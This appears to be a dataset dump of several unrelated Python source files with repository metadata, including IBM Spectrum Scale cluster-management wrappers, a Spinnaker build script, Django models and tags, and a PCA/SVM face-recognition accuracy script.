RC_SUCCESS, SpectrumScaleException
class SpectrumScaleNode:
def __init__(self, node_dict):
self.node = node_dict
self.node_number = int(self.node["nodeNumber"])
self.daemon_name = self.node["daemonNodeName"]
self.admin_name = self.node["adminNodeName"]
self.ip = self.node["ipAddress"]
self.admin_login = self.node["adminLoginName"]
self.designation = self.node["designation"]
self.other_roles = self.node["otherNodeRoles"]
self.role_alias = self.node["otherNodeRolesAlias"]
def get_node_number(self):
return self.node_number
def get_daemon_node_name(self):
return self.daemon_name
def get_admin_node_name(self):
return self.admin_name
def get_ip_address(self):
return self.ip
def get_admin_login_name(self):
return self.admin_login
def get_designation(self):
# The "designation" field can have the following values:
# "quorumManager"
# "quorum"
# "manager"
# ""
return self.designation
def get_other_node_roles(self):
# The "otherNodeRoles" field can have a comma seperated list of
# one of the following alphabets
# "M" - cloudNodeMarker
# "G" - gatewayNode
# "C" - cnfsNode
# "X" - cesNode
# "C" - ctdbNode
# "I" - ioNode
# "s" - snmpAgent
# "t" - tealAgent
# "Z" - perfmonNode
# "E" - cnfsEnabled
# "D" - cnfsDisabled
# "new" - NEW_NODE
# "" - OLD_NODE
# "Q" - quorumNode
# "N" - nonQuorumNode
return self.other_roles
def get_other_node_roles_alias(self):
# The "otherNodeRolesAlias" field can have a comma seperated list of
# one of the following
# "gateway"
# "ctdb"
# "ionode"
# "snmp_collector"
# "teal_collector"
# "perfmon"
# "ces"
# "cnfs"
return self.role_alias
def is_quorum_node(self):
if "quorum" in self.designation:
return True
return False
def is_manager_node(self):
if "manager" in (self.designation).lower():
return True
return False
def is_tct_node(self):
if "M" in self.other_roles:
return True
return False
def is_gateway_node(self):
if ("G" in self.other_roles or
"gateway" in self.role_alias):
return True
return False
def is_ctdb_node(self):
if "ctdb" in self.role_alias:
return True
return False
def is_io_node(self):
if ("I" in self.other_roles or
"ionode" in self.role_alias):
return True
return False
def is_snmp_node(self):
if ("s" in self.other_roles or
"snmp_collector" in self.role_alias):
return True
return False
def is_teal_node(self):
if ("t" in self.other_roles or
"teal_collector" in self.role_alias):
return True
return False
def is_perfmon_node(self):
if ("Z" in self.other_roles or
"perfmon" in self.role_alias):
return True
return False
def is_ces_node(self):
if ("X" in self.other_roles or
"ces" in self.role_alias):
return True
return False
def is_cnfs_node(self):
if ("E" in self.other_roles or
"D" in self.other_roles or
"cnfs" in self.role_alias):
return True
return False
def to_json(self):
return json.dumps(self.node)
def get_node_dict(self):
return self.node
def print_node(self):
print("Node Number : {0}".format(self.get_node_number()))
print("Daemon Node Name : {0}".format(self.get_daemon_node_name()))
print("IP Address : {0}".format(self.get_ip_address()))
print("Admin Node Name : {0}".format(self.get_admin_node_name()))
print("Designation : {0}".format(self.get_designation()))
print("Other Node Roles : {0}".format(self.get_other_node_roles()))
print("Admin Login Name : {0}".format(self.get_admin_login_name()))
print("Other Node Roles Alias : {0}".format(self.get_other_node_roles_alias()))
print("Is Quorum Node : {0}".format(self.is_quorum_node()))
print("Is Manager Node : {0}".format(self.is_manager_node()))
print("Is TCT Node : {0}".format(self.is_tct_node()))
print("Is Gateway Node : {0}".format(self.is_gateway_node()))
print("Is CTDB Node : {0}".format(self.is_ctdb_node()))
print("Is IO Node : {0}".format(self.is_io_node()))
print("Is SNMP Node : {0}".format(self.is_snmp_node()))
print("Is Teal Node : {0}".format(self.is_teal_node()))
print("Is Perfmon Node : {0}".format(self.is_perfmon_node()))
print("Is CES Node : {0}".format(self.is_ces_node()))
print("Is CNFS Node : {0}".format(self.is_cnfs_node()))
def __str__(self):
return str("Node Number : {0}\n"
"Daemon Node Name : {1}\n"
"IP Address : {2}\n"
"Admin Node Name : {3}\n"
"Designation : {4}\n"
"Other Node Roles : {5}\n"
"Admin Login Name : {6}\n"
"Other Node Roles Alias : {7}\n"
"Is Quorum Node : {8}\n"
"Is Manager Node : {9}\n"
"Is TCT Node : {10}\n"
"Is Gateway Node : {11}\n"
"Is CTDB Node : {12}\n"
"Is IO Node : {13}\n"
"Is SNMP Node : {14}\n"
"Is Teal Node : {15}\n"
"Is Perfmon Node : {16}\n"
"Is CES Node : {17}\n"
"Is CNFS Node : {18}".format(
self.get_node_number(),
self.get_daemon_node_name(),
self.get_ip_address(),
self.get_admin_node_name(),
self.get_designation(),
self.get_other_node_roles(),
self.get_admin_login_name(),
self.get_other_node_roles_alias(),
self.is_quorum_node(),
self.is_manager_node(),
self.is_tct_node(),
self.is_gateway_node(),
self.is_ctdb_node(),
self.is_io_node(),
self.is_snmp_node(),
self.is_teal_node(),
self.is_perfmon_node(),
self.is_ces_node(),
self.is_cnfs_node()))
@staticmethod
def get_state(node_names=[]):
stdout = stderr = ""
rc = RC_SUCCESS
cmd = [os.path.join(GPFS_CMD_PATH, "mmgetstate")]
if len(node_names) == 0:
cmd.append("-a")
else:
# If a set of node names have ben provided, use that instead
node_name_str = ' '.join(node_names)
cmd.append("-N")
cmd.append(node_name_str)
cmd.append("-Y")
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Retrieving the node state failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
node_state_dict = parse_unique_records(stdout)
node_state_list = node_state_dict["mmgetstate"]
node_state = {}
for node in node_state_list:
node_state[node["nodeName"]] = node["state"]
return node_state
@staticmethod
def shutdown_node(node_name, wait=True):
stdout = stderr = ""
rc = RC_SUCCESS
if isinstance(node_name, basestring):
node_name_str = node_name
node_name_list = [node_name]
else:
node_name_str = ' '.join(node_name)
node_name_list = node_name
cmd = [os.path.join(GPFS_CMD_PATH, "mmshutdown"), "-N", node_name_str]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Shutting down node failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
if wait:
# Wait for a maximum of 36 * 5 = 180 seconds (3 minutes)
MAX_RETRY = 36
retry = 0
done = False
while(not done and retry < MAX_RETRY):
time.sleep(5)
node_state = SpectrumScaleNode.get_state(node_name_list)
done = all("down" in state for state in node_state.values())
retry = retry + 1
if not done:
raise SpectrumScaleException("Shutting down node(s) timed out",
cmd[0], cmd[1:], -1, "",
"Node state is not \"down\" after retries")
return rc, stdout
@staticmethod
def start_node(node_name, wait=True):
stdout = stderr = ""
rc = RC_SUCCESS
if isinstance(node_name, basestring):
node_name_str = node_name
node_name_list = [node_name]
else:
node_name_str = ' '.join(node_name)
node_name_list = node_name
cmd = [os.path.join(GPFS_CMD_PATH, "mmstartup"), "-N", node_name_str]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Starting node failed", cmd[0],
cmd[1:], rc, stdout, stderr)
if wait:
# Wait for a maximum of 36 * 5 = 180 seconds (3 minutes)
MAX_RETRY = 36
retry = 0
done = False
while(not done and retry < MAX_RETRY):
time.sleep(5)
node_state = SpectrumScaleNode.get_state(node_name_list)
done = all("active" in state for state in node_state.values())
retry = retry + 1
if not done:
raise SpectrumScaleException("Starting node(s) timed out",
cmd[0], cmd[1:], -1, ""
"Node state is not \"active\" after retries")
return rc, stdout
class SpectrumScaleCluster:
def __retrieve_cluster_info(self):
stdout = stderr = ""
rc = RC_SUCCESS
cmd = [os.path.join(GPFS_CMD_PATH, "mmlscluster"), "-Y"]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Retrieving the cluster information failed",
cmd[0], cmd[1:], rc, stdout, stderr)
return parse_aggregate_cmd_output(stdout,
["clusterSummary",
"cnfsSummary",
"cesSummary"])
def __init__(self):
self.cluster_dict = self.__retrieve_cluster_info()
self.name = self.cluster_dict["clusterSummary"]["clusterName"]
self.c_id = self.cluster_dict["clusterSummary"]["clusterId"]
self.uid_domain = self.cluster_dict["clusterSummary"]["uidDomain"]
self.rsh_path = self.cluster_dict["clusterSummary"]["rshPath"]
self.rsh_sudo_wrapper = self.cluster_dict["clusterSummary"]["rshSudoWrapper"]
self.rcp_path = self.cluster_dict["clusterSummary"]["rcpPath"]
self.rcp_sudo_wrapper = self.cluster_dict["clusterSummary"]["rcpSudoWrapper"]
self.repository_type = self.cluster_dict["clusterSummary"]["repositoryType"]
self.primary_server = self.cluster_dict["clusterSummary"]["primaryServer"]
self.secondary_server = self.cluster_dict["clusterSummary"]["secondaryServer"]
def get_name(self):
return self.name
def get_id(self):
return self.c_id
def get_uid_domain(self):
return self.uid_domain
def get_rsh_path(self):
return self.rsh_path
def get_rsh_sudo_wrapper(self):
return self.rsh_sudo_wrapper
def get_rcp_path(self):
return self.rcp_path
def get_rcp_sudo_wrapper(self):
return self.rcp_sudo_wrapper
def get_repository_type(self):
return self.repository_type
def get_primary_server(self):
return self.primary_server
def get_secondary_server(self):
return self.secondary_server
def __str__(self):
return str("Cluster Name : {0}\n"
"Cluster ID : {1}\n"
"UID Domain : {2}\n"
"rsh Path : {3}\n"
"rsh Sudo Wrapper: {4}\n"
"rcp Path : {5}\n"
"rcp Sudo Wrapper: {6}\n"
"Repository Type : {7}\n"
"Primary Server : {8}\n"
"Secondary Server: {9}".format(
self.get_name(),
self.get_id(),
self.get_uid_domain(),
self.get_rsh_path(),
self.get_rsh_sudo_wrapper(),
self.get_rcp_path(),
self.get_rcp_sudo_wrapper(),
self.get_repository_type(),
self.get_primary_server(),
self.get_secondary_server()))
def to_json(self):
return json.dumps(self.cluster_dict)
def get_cluster_dict(self):
return self.cluster_dict
def get_nodes(self):
node_list = []
for node in self.cluster_dict["clusterNode"]:
node_instance = SpectrumScaleNode(node)
node_list.append(node_instance)
return node_list
@staticmethod
def delete_node(node_name):
stdout = stderr = ""
rc = RC_SUCCESS
if isinstance(node_name, basestring):
node_name_str = node_name
else:
node_name_str = ' '.join(node_name)
cmd = [os.path.join(GPFS_CMD_PATH, "mmdelnode"), "-N", node_name_str]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Deleting node from cluster failed",
cmd[0], cmd[1:], rc, stdout, stderr)
return rc, stdout
@staticmethod
def add_node(node_name, stanza_path):
stdout = stderr = ""
rc = RC_SUCCESS
if isinstance(node_name, basestring):
node_name_str = node_name
else:
node_name_str = ' '.join(node_name)
cmd = [os.path.join(GPFS_CMD_PATH, "mmaddnode"),
"-N", stanza_path, "--accept"]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Adding node to cluster failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
return rc, stdout, stderr
@staticmethod
def apply_license(node_name, license):
stdout = stderr = ""
rc = RC_SUCCESS
if isinstance(node_name, basestring):
node_name_str = node_name
else:
node_name_str = ' '.join(node_name)
cmd = [os.path.join(GPFS_CMD_PATH, "mmchlicense"), license,
"--accept", "-N", node_name_str]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Changing license on node failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
return rc, stdout
@staticmethod
def create_cluster(name, stanza_path):
stdout = stderr = ""
rc = RC_SUCCESS
cmd = [os.path.join(GPFS_CMD_PATH, "mmcrcluster"), "-N", stanza_path,
"-C", name]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Creating cluster failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
return rc, stdout
@staticmethod
def delete_cluster(name):
stdout = stderr = ""
rc = RC_SUCCESS
cmd = [os.path.join(GPFS_CMD_PATH, "mmdelnode"), "-a"]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Deleting cluster failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
return rc, stdout
def main():
cluster = SpectrumScaleCluster()
print(cluster.to_json())
print("\n")
for node in cluster.get_nodes():
print(node)
print("\n")
if __name__ == "__main__":
main()
|
[
"mutmuthi@in.ibm.com"
] |
mutmuthi@in.ibm.com
|
c15dd485cf3f4d881f10b046eb48569bf69ba54c
|
46c148c50a008da9af4b36a2ec0f0cf3dda1a3a7
|
/dev/build_prevalidation.py
|
5b8de879cbf976c013dab85795f2842449a45b2f
|
[
"Apache-2.0"
] |
permissive
|
dcaro/spinnaker
|
caa1f1ff5d76bf7c22f6fdbc18343811e5fe2a6c
|
7e6836f36f0d98564bd466a95626625ff495e2c9
|
refs/heads/master
| 2021-01-18T22:57:02.897724
| 2017-06-02T19:03:33
| 2017-06-02T19:03:33
| 93,205,405
| 1
| 0
| null | 2017-06-02T21:32:53
| 2017-06-02T21:32:53
| null |
UTF-8
|
Python
| false
| false
| 4,409
|
py
|
#!/usr/bin/python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import sys
from annotate_source import Annotator
from build_release import Builder
from generate_bom import BomGenerator
from refresh_source import Refresher
from spinnaker.run import check_run_quick
def __annotate_component(annotator, component):
"""Annotate the component's source but don't include it in the BOM.
Returns:
Tuple of ([VersionBump] Halyard version bump, [string] head commit hash)
"""
annotator.path = component
annotator.parse_git_tree()
version_bump = annotator.tag_head()
head_hash = annotator.get_head_commit()
annotator.delete_unwanted_tags()
return (version_bump, head_hash)
def __record_halyard_nightly_version(version_bump, head_hash, options):
"""Record the version and commit hash at which Halyard was built in a bucket.
Assumes that gsutil is installed on the machine this script is run from.
This function uses `gsutil rsync` to read the GCS file, changes it in-place,
and then uses `gsutil rsync` to write the file again. `rsync` is eventually
consistent, so running this script (or manually manipulating the GCS file)
concurrently could likely result in file corruption. Don't parallelize this.
"""
bucket_uri = options.hal_nightly_bucket_uri
build_number = options.build_number
local_bucket_name = os.path.basename(bucket_uri)
# Copy all the bucket contents to local (-r) and get rid of extra stuff (-d).
if not os.path.exists(local_bucket_name):
os.mkdir(local_bucket_name)
check_run_quick('gsutil rsync -r -d {remote_uri} {local_bucket}'
.format(remote_uri=bucket_uri, local_bucket=local_bucket_name))
hal_version = version_bump.version_str.replace('version-', '')
new_hal_nightly_entry = ('{version}-{build}: {commit}'
.format(version=hal_version, build=build_number, commit=head_hash))
nightly_entry_file = '{0}/nightly-version-commits.yml'.format(local_bucket_name)
with open(nightly_entry_file, 'a') as nef:
nef.write('{0}\n'.format(new_hal_nightly_entry))
# Now sync the local dir with the bucket again after the update.
check_run_quick('gsutil rsync -r -d {local_bucket} {remote_uri}'
.format(remote_uri=bucket_uri, local_bucket=local_bucket_name))
def init_argument_parser(parser):
parser.add_argument('--hal_nightly_bucket_uri', default='',
help='The URI of the bucket to record the version and commit at which we built Halyard.')
# Don't need to init args for Annotator since BomGenerator extends it.
BomGenerator.init_argument_parser(parser)
Builder.init_argument_parser(parser)
def main():
"""Build a Spinnaker release to be validated by Citest.
"""
parser = argparse.ArgumentParser()
init_argument_parser(parser)
options = parser.parse_args()
annotator = Annotator(options)
halyard_bump, halyard_head_hash = __annotate_component(annotator, 'halyard')
bom_generator = BomGenerator(options)
bom_generator.determine_and_tag_versions()
if options.container_builder == 'gcb':
bom_generator.write_container_builder_gcr_config()
elif options.container_builder == 'docker':
bom_generator.write_docker_version_files()
else:
raise NotImplementedError('container_builder="{0}"'
.format(options.container_builder))
Builder.do_build(options, build_number=options.build_number,
container_builder=options.container_builder)
# Load version information into memory and write BOM to disk. Don't publish yet.
bom_generator.write_bom()
bom_generator.publish_microservice_configs()
__record_halyard_nightly_version(halyard_bump, halyard_head_hash, options)
bom_generator.publish_boms()
bom_generator.generate_changelog()
if __name__ == '__main__':
sys.exit(main())
|
[
"noreply@github.com"
] |
dcaro.noreply@github.com
|
3a8767df98e7b1d18e76b37e85c90b3bf01bdcf9
|
f702230ed3a5e1bc3f033b3330b90e517ee6603f
|
/blog/models.py
|
8a13891964de2b8a653acb07df8e3291a79ae81d
|
[] |
no_license
|
yanadhorn/crdb
|
9a670feab0d16fcf66f1180418d686dad30fcd50
|
31bd85a674784f125bc44f597b8bb1b90c08226b
|
refs/heads/master
| 2020-04-03T10:50:57.414455
| 2018-12-04T07:51:05
| 2018-12-04T07:51:05
| 155,204,209
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 821
|
py
|
from django.db import models
from persons.models import person
#import user django
from django.conf import settings
# Create your models here.
# title
# pub_date
# body
# image
class Blog(models.Model):
title = models.CharField(max_length=255)
pub_date = models.DateTimeField()
body = models.TextField()
image = models.ImageField(upload_to='images/')
# person_related = models.ManyToManyField(person)
author = models.ForeignKey(settings.AUTH_USER_MODEL,on_delete=models.CASCADE)
objects = models.Manager()
def __str__(self):
return self.title
def summary(self):
return self.body[0:100]
def pub_date_pretty(self):
return self.pub_date.strftime('%b %e %Y')
# Add the blog app to the setting
# Create a migration
# Migrate
# Add the admin
|
[
"yanadhorn@gmail.com"
] |
yanadhorn@gmail.com
|
e8506016d8eec7e2aa0b0eade7ae260234fc235d
|
7edf5b52eb27dd5c757ec7fef1fd0c8ff581cb46
|
/src/settings/config.py
|
e9068410a9875d793cc973abbe5513521915cef2
|
[
"MIT"
] |
permissive
|
NNNMM12345/Discord_Sandbot
|
d9bc520a44ef623dbf87d3aa8b5a2bbf2884f5e1
|
76ed7a97efd1d6d0eb7efd9aff78985e63cfb6c6
|
refs/heads/master
| 2021-04-15T06:41:16.460399
| 2018-04-01T12:48:55
| 2018-04-01T12:48:55
| 126,205,295
| 4
| 2
|
MIT
| 2018-04-01T11:27:03
| 2018-03-21T16:04:24
|
Python
|
UTF-8
|
Python
| false
| false
| 91
|
py
|
from utility.load import get_api_token
DISCORD_TOKEN = get_api_token('discord_api_token')
|
[
"e.cousinet@gmail.com"
] |
e.cousinet@gmail.com
|
98977b0c1310b852289fc427fb6ec1c464638be7
|
dcd1e10a3cf9f197ce35d2db03042041c1959697
|
/ismcts/jass_stuff/hands.py
|
3834fba0766965c2b7d0b0c429d83e283fb6341c
|
[] |
no_license
|
larryharry/jass-bot
|
040ec477fa9bb3eecf11efede579210de53cba31
|
7eb1d8795f678c5a09c20a11cba223ce8b0238d2
|
refs/heads/master
| 2023-01-31T15:15:44.439728
| 2020-12-16T18:07:34
| 2020-12-16T18:07:34
| 300,552,114
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,551
|
py
|
from __future__ import annotations
from __future__ import annotations
from typing import List
import numpy as np
from ismcts.jass_stuff.hand import Hand
class Hands:
def __init__(self, hands: List[Hand]):
self._hands = hands
@classmethod
def empty(cls):
return cls([Hand.empty(), Hand.empty(), Hand.empty(), Hand.empty()])
@classmethod
def by_hot_encoded(cls, hot_encoded_hands: np.ndarray) -> Hands:
hands = cls.empty()
for player, hot_encoded_hand in enumerate(hot_encoded_hands):
hands.add_hand(player, Hand.by_hot_encoded(hot_encoded_hand))
return hands
def add_hand(self, player: int, hand: Hand) -> None:
self._hands[player] = hand
def is_fully_covered_by(self, hands: Hands) -> bool:
for player in range(4):
if not hands.get_hand(player).is_fully_covered_by(self._hands[player]):
return False
return True
def get_hand(self, player: int) -> Hand:
if self._hands[player] == -1:
raise Exception('There is no hand for user {} '.format(player))
else:
return self._hands[player]
def does_player_has_card(self, player: int, card: int) -> bool:
return card in self._hands[player]
def remove_card_for_player(self, player: int, card: int) -> None:
self._hands[player].remove_card(card)
def copy(self) -> Hands:
hands = Hands.empty()
for i in range(4):
hands.add_hand(i, self._hands[i])
return hands
|
[
"steinegger.manuel@gmail.com"
] |
steinegger.manuel@gmail.com
|
71bad8fd989996259745fc43343f9736f7276d00
|
a76ffb5304f686254dddf824a04c2afdf70d37f8
|
/solidworksDv/solidworks_api_doc.py
|
07f8554135643d2d5907763dcff3d231573710e0
|
[] |
no_license
|
openmc/SmartTool-Machanical-Design
|
b3b6f8bd711620081fa6deddbce449eb72ae2fcc
|
145494a05569bb18fc656e0636740a5fe572a063
|
refs/heads/master
| 2020-05-23T04:08:36.060530
| 2019-12-13T13:39:58
| 2019-12-13T13:39:58
| 186,629,542
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
import win32com.client
#连接solidworks对象
swapp = win32com.client.Dispatch("sldworks.Application")
#窗口可见(窗口显示、隐藏)
visible = swapp.visible
#打开文件-参数(文件路径名称,1)
open_file = swapp.OpenDoc(r"path + part_name", 1)
#实例化活动文档
part = swapp.ActiveDoc
#活动文档另存为
new_name = part.SaveAs3(r"path + part_name", 0, 2)
|
[
"252284222@qq.com"
] |
252284222@qq.com
|
3ac62a3397c426d97772c5dab0060e573d15e0c9
|
f3edace90016b25ae7044d323d7b5754a322ea72
|
/tests/infra/__init__.py
|
206dcad2661a8be2b86fd948794db5422f346b7a
|
[
"MIT"
] |
permissive
|
HumanCellAtlas/flash-flood
|
b60871af5fa0f310c6e4df8c4d71fee50dbd4986
|
f1de428ee11eac5bd40b47dec1b22b59519e52f9
|
refs/heads/master
| 2020-06-17T22:06:43.559204
| 2020-02-20T18:17:14
| 2020-02-20T18:17:14
| 196,073,836
| 0
| 1
|
MIT
| 2020-10-08T18:26:28
| 2019-07-09T19:49:50
|
Python
|
UTF-8
|
Python
| false
| false
| 197
|
py
|
import os
def get_env(varname):
if varname not in os.environ:
raise RuntimeError(
"Please set the {} environment variable".format(varname))
return os.environ[varname]
|
[
"noreply@github.com"
] |
HumanCellAtlas.noreply@github.com
|
85d7b4b367337c675e06d6a6a4635eb8333bc0b3
|
b6f8b88672cd9d7f6ce21c14a6abd726e6521047
|
/pinax/projects/sample_group_project/apps/basic_groups/templatetags/basic_group_tags.py
|
d0706e98556d871b05540f8f66aadc74df78c098
|
[] |
no_license
|
jipan25/linkedby
|
778b10ff794cf623adebb06e438f3fdc0324cd38
|
ca9ed7ebdfd760a19d3123987a5e508f73d54629
|
refs/heads/master
| 2016-09-06T10:08:28.071487
| 2011-09-17T04:05:04
| 2011-09-17T04:05:04
| 2,403,258
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
from django import template
from basic_groups.forms import BasicGroupForm
register = template.Library()
@register.inclusion_tag("basic_groups/group_item.html")
def show_group(group):
return {"group": group}
# @@@ should move these next two as they aren't particularly group-specific
@register.simple_tag
def clear_search_url(request):
getvars = request.GET.copy()
if 'search' in getvars:
del getvars['search']
if len(getvars.keys()) > 0:
return "%s?%s" % (request.path, getvars.urlencode())
else:
return request.path
@register.simple_tag
def persist_getvars(request):
getvars = request.GET.copy()
if len(getvars.keys()) > 0:
return "?%s" % getvars.urlencode()
return ''
|
[
"jipan250@163.com"
] |
jipan250@163.com
|
c0fe5f7abe74fa620bf07936184bec1c57bcb8fb
|
c2860f01fe0b56b63d0112d94132304c8ad1a29b
|
/ecommerce/accounts/migrations/0004_remove_user_active.py
|
bfaf289c33012bc02924f662fa3ffe715e23f19e
|
[] |
no_license
|
TarekCsePust/Ecommerce-With-Django-Framework-Postgresql
|
63194b1e322d9281ce7008a45ddf1482a34c9a64
|
50d2172f3c6d2f1a5652afb765e03064edd07e52
|
refs/heads/master
| 2020-04-02T04:37:59.006110
| 2019-01-24T07:17:04
| 2019-01-24T07:17:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
# Generated by Django 2.0.7 on 2018-08-29 14:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_user_is_active'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='active',
),
]
|
[
"hasantarek12cse@gmail.com"
] |
hasantarek12cse@gmail.com
|
f32cd92673d58e130c5850aa8213e76211644549
|
d21e217aeb1876edd4b5343432c45ec1e33ee46f
|
/yalefaces/yalefaces/mypackage/OlivettiDataset/mypackage/download_olivetty_faces.py
|
38740921ffd262c92ba441ea7ef6654ab6c8e608
|
[] |
no_license
|
swoichha/FaceRecognition
|
e0a7976fdff0bbc56277b03066cba188261954bb
|
0f8ffd8bcfba9e17db52dae8fe66e8f5d50f08f9
|
refs/heads/master
| 2020-05-07T13:41:14.661561
| 2019-11-04T12:26:31
| 2019-11-04T12:26:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,646
|
py
|
# Imports
import cv2
import os
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from PIL import Image
from numpy import linalg as LA
# from showFaces import show_40_distinct_people, show_10_faces_of_n_subject
from sklearn.metrics import classification_report
#Machine Learning
from sklearn.model_selection import train_test_split
from sklearn.decomposition import PCA
from sklearn.svm import SVC
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn import metrics
from time import time
from readImages import readFiles
from faceRecognition import faceRecog
from weights import weight
import warnings
warnings.filterwarnings("ignore", category=FutureWarning)
imageArray = ''
def getAccuracy():
data=np.load("../mypackage/olivetti_faces.npy")
target=np.load("../mypackage/olivetti_faces_target.npy")
# print("There are {} images in the dataset".format(len(data)))
# print("There are {} unique targets in the dataset".format(len(np.unique(target))))
# print("Size of each image is {}x{}".format(data.shape[1],data.shape[2]))
# print("Pixel values were scaled to [0,1] interval. e.g:{}".format(data[0][0,:4]))
# print("unique target number:",np.unique(target))
# show_40_distinct_people(data, np.unique(target))
#You can playaround subject_ids to see other people faces
# show_10_faces_of_n_subject(images=data, subject_ids=[0,5, 21, 24, 36])
# plt.show()
print("X shape:",data.shape)
#We reshape images for machine learnig model
X=data.reshape((data.shape[0],data.shape[1]*data.shape[2]))
print("X shape:",X.shape)
X_train, X_test, y_train, y_test=train_test_split(X, target, test_size=0.3, stratify=target, random_state=0)
print("X_train shape:",X_train.shape)
print("y_train shape:{}".format(y_train.shape))
dim = np.shape(X_train)
imageCount, total_pixels = dim
global normalizeFaceVector
normalizeFaceVector = np.zeros((imageCount, total_pixels), order='C')
def averageOfArray(x,total):
x = np.sum(x, axis = 0)
x = (x/total)
return x
averageImage = averageOfArray(X_train,imageCount)
# ------------------Ploting image from imageArray------------------------------
resizedAverageImage = np.reshape(averageImage,(64,64))
# plt.imshow(resizedAverageImage,cmap='gray')
# plt.show()
cum_var_exp, eig_pairs,normalizeFaceVector = faceRecog(X_train,imageCount,averageImage,normalizeFaceVector)
#k is equals to the n_componet of pca
k=0
for i in range(len(cum_var_exp)):
if cum_var_exp[i] < 95:
k = k+1
matrix_w = np.zeros((k,280))
#------storing lower dimensionality k eigenvectors into matrix_w-----------
for i in range(k):
matrix_w[i] = np.array(eig_pairs[i][1].reshape(1,280))
matrix_wT = matrix_w.transpose()
#-----------converting lower dimension k eigenvectors to original face dimensionality---------------------
Y = normalizeFaceVector.dot(matrix_wT)
k_eigenVector = np.transpose(Y)
# for i in range(len(k_eigenVector)):
# resized_eigenvector = np.array(np.reshape(k_eigenVector[i],(64,64)), dtype=float)
# plt.imshow(resized_eigenvector,cmap='gray')
# plt.show()
weight_coeff = weight(k_eigenVector,normalizeFaceVector,0)
X_train_pca = weight_coeff
# Initialize Classifer and fit training data
clf = SVC(kernel='rbf',C=10000,gamma=0.000001)
clf = clf.fit(X_train_pca, y_train)
print(k)
normalizeTestImg = X_test - averageImage
normalizeTestImg = normalizeTestImg.transpose()
testImgWeight = weight(k_eigenVector,normalizeTestImg,1)
print(testImgWeight.shape)
testImgWeightT = testImgWeight.transpose()
X_test_pca = testImgWeightT
y_pred = clf.predict(X_test_pca)
print("accuracy score:{:.2f}".format(metrics.accuracy_score(y_test, y_pred)))
print("Classification Results:\n{}".format(metrics.classification_report(y_test, y_pred)))
models=[]
models.append(('LDA', LinearDiscriminantAnalysis()))
models.append(("SVM",SVC(kernel='rbf',C=10000,gamma=0.000001)))
models.append(("LR",LogisticRegression()))
models.append(("NB",GaussianNB()))
models.append(("KNN",KNeighborsClassifier(n_neighbors=5)))
models.append(("DT",DecisionTreeClassifier()))
for name, model in models:
clf = model
clf.fit(X_train_pca, y_train)
y_pred = clf.predict(X_test_pca)
print(10*"=","{} Result".format(name).upper(),10*"=")
print("Accuracy score:{:0.4f}".format(metrics.accuracy_score(y_test, y_pred)))
print()
return
|
[
"swoichhaa@gmail.com"
] |
swoichhaa@gmail.com
|
3d35f7af891ce8ed8f8832aba3e969c4d237016d
|
3dabb35484171f7bae4a6dcd9773380ea2f90782
|
/senderFile.py
|
5360c0fecf26329e5063d6929f2a56ede2d0390a
|
[] |
no_license
|
TaglioUltimate/UDP
|
be71a4faeffdf800d6bc05ce241fd49ac168f39e
|
